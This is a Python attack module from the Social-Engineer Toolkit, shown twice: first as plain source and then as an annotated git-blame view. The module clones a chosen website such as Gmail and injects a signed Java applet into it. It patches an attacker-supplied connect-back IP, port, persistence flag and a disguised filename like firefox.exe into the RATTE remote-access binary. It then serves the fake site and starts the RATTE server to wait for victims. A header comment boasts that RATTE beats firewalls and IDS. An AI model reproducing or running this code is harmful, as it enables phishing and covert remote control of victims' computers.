social-engineer-toolkit/modules/ratte_module.py

#!/usr/bin/env python
#
# These are required fields
#
import sys
import subprocess
import os
from src.core.menu import text
from src.core import setcore as core
from time import sleep
import urlparse

# switch over to import core
#sys.path.append("src/core")
# import the core modules
#try: reload(core)
#except: import core

definepath = os.getcwd()

MAIN=" RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"

#This is RATTE (Remote Administration Tool Tommy Edition) attack module. It will launch a java applet attack to inject RATTE. Then it will launch RATTE-Server and wait for victim to connect. RATTE can beat local Firewalls, IDS and even EAL 4+ certified network firewalls.
#This release one is only for education!"
AUTHOR="   Thomas Werth"

httpd=None

#
# This will start a web server in the directory root you specify, so for example
# you clone a website then run it in that web server, it will pull any index.html file
#
def start_web_server_tw(directory,port):

    global httpd
    try:
        # import the threading, socketserver, and simplehttpserver
        import thread,SocketServer,SimpleHTTPServer
        # create the httpd handler for the simplehttpserver
        # we set the allow_reuse_address incase something hangs can still bind to port
        class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True
        # specify the httpd service on 0.0.0.0 (all interfaces) on port 80
        httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)
        # thread this mofo
        thread.start_new_thread(httpd.serve_forever,())
        # change directory to the path we specify for output path
        os.chdir(directory)

    # handle keyboard interrupts
    except KeyboardInterrupt:
        core.print_info("Exiting the SET web server...")
        httpd.socket.close()

    # handle the rest
    #except Exception:
    #    print "[*] Exiting the SET web server...\n"
    #    httpd.socket.close()

def stop_web_server_tw():
    global httpd
    try:
        httpd.socket.close()
    # handle the exception
    except Exception:
        httpd.socket.close()

#
# This will create the java applet attack from start to finish.
# Includes payload (reverse_meterpreter for now) cloning website
# and additional capabilities.
#
def java_applet_attack_tw(website,port,directory,ipaddr):

    # clone the website and inject java applet
    core.site_cloner(website,directory,"java")

    ############################################
    # use customized Ratte nehmen
    ############################################

    # this part is needed to rename the msf.exe file to a randomly generated one
    if os.path.isfile("src/program_junk/rand_gen"):
        # open the file
        fileopen=file("src/program_junk/rand_gen", "r")
        # start a loop
        for line in fileopen:
            # define executable name and rename it
            filename=line.rstrip()
            # move the file to the specified directory and filename
            subprocess.Popen("cp src/payloads//ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory,filename), shell=True).wait()


    # lastly we need to copy over the signed applet
    subprocess.Popen("cp src/program_junk/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (directory), shell=True).wait()

    #TODO index.html parsen und IPADDR:Port ersetzen
    fileopen=open("%s/index.html" % (directory), "rb")
    data=fileopen.read()
    fileopen.close()

    filewrite=open("%s/index.html" % (directory), "wb")

    toReplace=core.grab_ipaddress()+":80"

    #replace 3 times
    filewrite.write(data.replace(str(toReplace), ipaddr+":"+str(port), 3) )
    filewrite.close()

    # start the web server by running it in the background
    start_web_server_tw(directory,port)

#
# Start ratteserver
#
def ratte_listener_start(port):


    # launch ratteserver    using ../ cause of reports/ subdir
    #subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()
    subprocess.Popen("../src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()

def prepare_ratte(ipaddr,ratteport, persistent,customexe):

    core.print_status("preparing RATTE...")
    # replace ipaddress with one that we need for reverse connection back
    ############
    #Load content of RATTE
    ############
    fileopen=open("src/payloads/ratte/ratte.binary" , "rb")
    data=fileopen.read()
    fileopen.close()

    ############
    #PATCH Server IP into RATTE
    ############
    filewrite=open("src/program_junk/ratteM.exe", "wb")

    host=int(len(ipaddr)+1) * "X"
    rPort=int(len(str(ratteport))+1) * "Y"
    pers=int(len(str(persistent))+1) * "Z"
    #check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)
    if len(str(customexe)) > 0:
        cexe=int(len(str(customexe))+1) * "Q"
    else:
        cexe=""

    filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )
    filewrite.close()

# def main(): header is required
def main():
    valid_site = False
    valid_ip = False
    valid_persistence = False
    input_counter= 0
    site_input_counter=0

    #pause=raw_input("This module has finished completing. Press <enter> to continue")

    # Get a *VALID* website address
    while valid_site != True and site_input_counter < 3:
        website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)

        if site.scheme == "http" or site.scheme == "https":
            if site.netloc != "":
                valid_site = True
            else:
                if site_input_counter == 2:
                    core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
                    sleep(4)
                    return
                else:
                    core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
                    site_input_counter += 1
        else:
            if site_input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
                site_input_counter +=1
        #core.DebugInfo("site.scheme is: %s " % site.scheme)
        #core.DebugInfo("site.netloc is: %s " % site.netloc)
        #core.DebugInfo("site.path is: %s " % site.path)
        #core.DebugInfo("site.params are: %s " % site.params)
        #core.DebugInfo("site.query is: %s " % site.query)
        #core.DebugInfo("site.fragment is: %s " % site.fragment)

    while valid_ip != True and input_counter < 3:
        ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            else:
                input_counter += 1

    #javaport must be 80, cause applet uses in web injection port 80 to download payload!
    try:
        javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
        while javaport == 0 or javaport > 65535:
            if javaport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if javaport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
    except ValueError:
        #core.print_info("Port set to default of 80")
        javaport = 80
    #javaport=80

    try:
        ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        while ratteport == javaport or ratteport == 0 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Port must not be equal to javaport!")
            if ratteport == 0:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
    except ValueError:
        ratteport = 8080

    persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")

# j0fer 06-27-2012 #        while valid_persistence != True:
# j0fer 06-27-2012 #                persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 #                persistent=str.lower(persistent)
# j0fer 06-27-2012 #                if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 #                        persistent="NO"
# j0fer 06-27-2012 #                        valid_persistence = True
# j0fer 06-27-2012 #               elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 #                       persistent="YES"
# j0fer 06-27-2012 #                       valid_persistence = True
# j0fer 06-27-2012 #                else:
# j0fer 06-27-2012 #                       core.print_warning(text.YES_NO_RESPONSES)

    customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################

    prepare_ratte(ipaddr,ratteport,persistent,customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################

    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website,javaport, "reports/",ipaddr)

    fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
    for line in fileopen:
        ratte_random = line.rstrip()
    subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()

    #######################
    # start ratteserver
    #######################

    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00			`#!/usr/bin/env python`
			`#`
			`# These are required fields`
			`#`
			`import sys`
			`import subprocess`
			`import os`
			`from src.core.menu import text`
			`from src.core import setcore as core`
			`from time import sleep`
			`import urlparse`

			`# switch over to import core`
			`#sys.path.append("src/core")`
			`# import the core modules`
			`#try: reload(core)`
			`#except: import core`

			`definepath = os.getcwd()`

			`MAIN=" RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first"`

			`#This is RATTE (Remote Administration Tool Tommy Edition) attack module. It will launch a java applet attack to inject RATTE. Then it will launch RATTE-Server and wait for victim to connect. RATTE can beat local Firewalls, IDS and even EAL 4+ certified network firewalls.`
			`#This release one is only for education!"`
			`AUTHOR=" Thomas Werth"`

			`httpd=None`

			`#`
			`# This will start a web server in the directory root you specify, so for example`
			`# you clone a website then run it in that web server, it will pull any index.html file`
			`#`
			`def start_web_server_tw(directory,port):`

Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`global httpd`
			`try:`
			`# import the threading, socketserver, and simplehttpserver`
			`import thread,SocketServer,SimpleHTTPServer`
			`# create the httpd handler for the simplehttpserver`
			`# we set the allow_reuse_address incase something hangs can still bind to port`
			`class ReusableTCPServer(SocketServer.TCPServer): allow_reuse_address=True`
			`# specify the httpd service on 0.0.0.0 (all interfaces) on port 80`
			`httpd = ReusableTCPServer(("0.0.0.0", port),SimpleHTTPServer.SimpleHTTPRequestHandler)`
			`# thread this mofo`
			`thread.start_new_thread(httpd.serve_forever,())`
			`# change directory to the path we specify for output path`
			`os.chdir(directory)`

			`# handle keyboard interrupts`
			`except KeyboardInterrupt:`
			`core.print_info("Exiting the SET web server...")`
			`httpd.socket.close()`

			`# handle the rest`
			`#except Exception:`
			`# print "[*] Exiting the SET web server...\n"`
			`# httpd.socket.close()`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
			`def stop_web_server_tw():`
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`global httpd`
			`try:`
			`httpd.socket.close()`
			`# handle the exception`
			`except Exception:`
			`httpd.socket.close()`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
			`#`
			`# This will create the java applet attack from start to finish.`
			`# Includes payload (reverse_meterpreter for now) cloning website`
			`# and additional capabilities.`
			`#`
			`def java_applet_attack_tw(website,port,directory,ipaddr):`

Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`# clone the website and inject java applet`
			`core.site_cloner(website,directory,"java")`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`############################################`
			`# use customized Ratte nehmen`
			`############################################`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`# this part is needed to rename the msf.exe file to a randomly generated one`
			`if os.path.isfile("src/program_junk/rand_gen"):`
			`# open the file`
			`fileopen=file("src/program_junk/rand_gen", "r")`
			`# start a loop`
			`for line in fileopen:`
			`# define executable name and rename it`
			`filename=line.rstrip()`
			`# move the file to the specified directory and filename`
			`subprocess.Popen("cp src/payloads//ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory,filename), shell=True).wait()`


			`# lastly we need to copy over the signed applet`
			`subprocess.Popen("cp src/program_junk/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (directory), shell=True).wait()`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`#TODO index.html parsen und IPADDR:Port ersetzen`
			`fileopen=open("%s/index.html" % (directory), "rb")`
			`data=fileopen.read()`
			`fileopen.close()`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`filewrite=open("%s/index.html" % (directory), "wb")`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`toReplace=core.grab_ipaddress()+":80"`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`#replace 3 times`
			`filewrite.write(data.replace(str(toReplace), ipaddr+":"+str(port), 3) )`
			`filewrite.close()`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`# start the web server by running it in the background`
			`start_web_server_tw(directory,port)`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
			`#`
			`# Start ratteserver`
			`#`
			`def ratte_listener_start(port):`
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00

			`# launch ratteserver using ../ cause of reports/ subdir`
			`#subprocess.Popen("%s/src/set_payloads/ratte/ratteserver %d" % (os.getcwd(),port), shell=True).wait()`
			`subprocess.Popen("../src/payloads/ratte/ratteserver %d" % (port), shell=True).wait()`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
			`def prepare_ratte(ipaddr,ratteport, persistent,customexe):`

Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`core.print_status("preparing RATTE...")`
			`# replace ipaddress with one that we need for reverse connection back`
			`############`
			`#Load content of RATTE`
			`############`
			`fileopen=open("src/payloads/ratte/ratte.binary" , "rb")`
			`data=fileopen.read()`
			`fileopen.close()`

			`############`
			`#PATCH Server IP into RATTE`
			`############`
			`filewrite=open("src/program_junk/ratteM.exe", "wb")`

			`host=int(len(ipaddr)+1) * "X"`
			`rPort=int(len(str(ratteport))+1) * "Y"`
			`pers=int(len(str(persistent))+1) * "Z"`
			`#check ob cexe > 0, sonst wird ein Feld gepatcht (falsch!)`
			`if len(str(customexe)) > 0:`
			`cexe=int(len(str(customexe))+1) * "Q"`
			`else:`
			`cexe=""`

			`filewrite.write(data.replace(str(cexe), customexe+"\x00", 1).replace(str(pers), persistent+"\x00", 1).replace(str(host), ipaddr+"\x00", 1).replace(str(rPort), str(ratteport)+"\x00", 1) )`
			`filewrite.close()`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
			`# def main(): header is required`
			`def main():`
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`valid_site = False`
			`valid_ip = False`
			`valid_persistence = False`
			`input_counter= 0`
			`site_input_counter=0`

			`#pause=raw_input("This module has finished completing. Press <enter> to continue")`

			`# Get a VALID website address`
			`while valid_site != True and site_input_counter < 3:`
			`website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))`
			`site = urlparse.urlparse(website)`

			`if site.scheme == "http" or site.scheme == "https":`
			`if site.netloc != "":`
			`valid_site = True`
			`else:`
			`if site_input_counter == 2:`
			`core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)`
			`sleep(4)`
			`return`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00			`else:`
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`core.print_warning("I can't determine the fqdn or IP of the site. Try again?")`
			`site_input_counter += 1`
			`else:`
			`if site_input_counter == 2:`
			`core.print_error("\nMaybe you have the address written down wrong?")`
			`sleep(4)`
			`return`
			`else:`
			`core.print_warning("I couldn't determine whether this is an http or https site. Try again?")`
			`site_input_counter +=1`
			`#core.DebugInfo("site.scheme is: %s " % site.scheme)`
			`#core.DebugInfo("site.netloc is: %s " % site.netloc)`
			`#core.DebugInfo("site.path is: %s " % site.path)`
			`#core.DebugInfo("site.params are: %s " % site.params)`
			`#core.DebugInfo("site.query is: %s " % site.query)`
			`#core.DebugInfo("site.fragment is: %s " % site.fragment)`

			`while valid_ip != True and input_counter < 3:`
			`ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))`
			`valid_ip = core.validate_ip(ipaddr)`
			`if not valid_ip:`
			`if input_counter == 2:`
			`core.print_error("\nMaybe you have the address written down wrong?")`
			`sleep(4)`
			`return`
			`else:`
			`input_counter += 1`

			`#javaport must be 80, cause applet uses in web injection port 80 to download payload!`
			`try:`
			`javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))`
			`while javaport == 0 or javaport > 65535:`
			`if javaport == 0:`
			`core.print_warning(text.PORT_NOT_ZERO)`
			`if javaport > 65535:`
			`core.print_warning(text.PORT_TOO_HIGH)`
			`javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))`
			`except ValueError:`
			`#core.print_info("Port set to default of 80")`
			`javaport = 80`
			`#javaport=80`

			`try:`
			`ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))`
			`while ratteport == javaport or ratteport == 0 or ratteport > 65535:`
			`if ratteport == javaport:`
			`core.print_warning("Port must not be equal to javaport!")`
			`if ratteport == 0:`
			`core.print_warning(text.PORT_NOT_ZERO)`
			`if ratteport > 65535:`
			`core.print_warning(text.PORT_TOO_HIGH)`
			`ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))`
			`except ValueError:`
			`ratteport = 8080`

			`persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no\|yes]?")`

			`# j0fer 06-27-2012 # while valid_persistence != True:`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00			`# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no\|yes]?"))`
			`# j0fer 06-27-2012 # persistent=str.lower(persistent)`
			`# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":`
			`# j0fer 06-27-2012 # persistent="NO"`
			`# j0fer 06-27-2012 # valid_persistence = True`
			`# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":`
			`# j0fer 06-27-2012 # persistent="YES"`
			`# j0fer 06-27-2012 # valid_persistence = True`
			`# j0fer 06-27-2012 # else:`
			`# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)`

Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`#######################################`
			`# prepare RATTE`
			`#######################################`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`prepare_ratte(ipaddr,ratteport,persistent,customexe)`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`######################################`
			`# Java Applet Attack to deploy RATTE`
			`#######################################`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`core.print_info("Starting java applet attack...")`
			`java_applet_attack_tw(website,javaport, "reports/",ipaddr)`
Main conversation over to git via svn 2012-12-31 22:11:37 +00:00
Fixed spacing using reindent.py on all files 2013-03-16 19:47:25 +00:00			`fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")`
			`for line in fileopen:`
			`ratte_random = line.rstrip()`
			`subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()`

			`#######################`
			`# start ratteserver`
			`#######################`

			`core.print_info("Starting ratteserver...")`
			`ratte_listener_start(ratteport)`

			`######################`
			`# stop webserver`
			`######################`
			`stop_web_server_tw()`
			`return`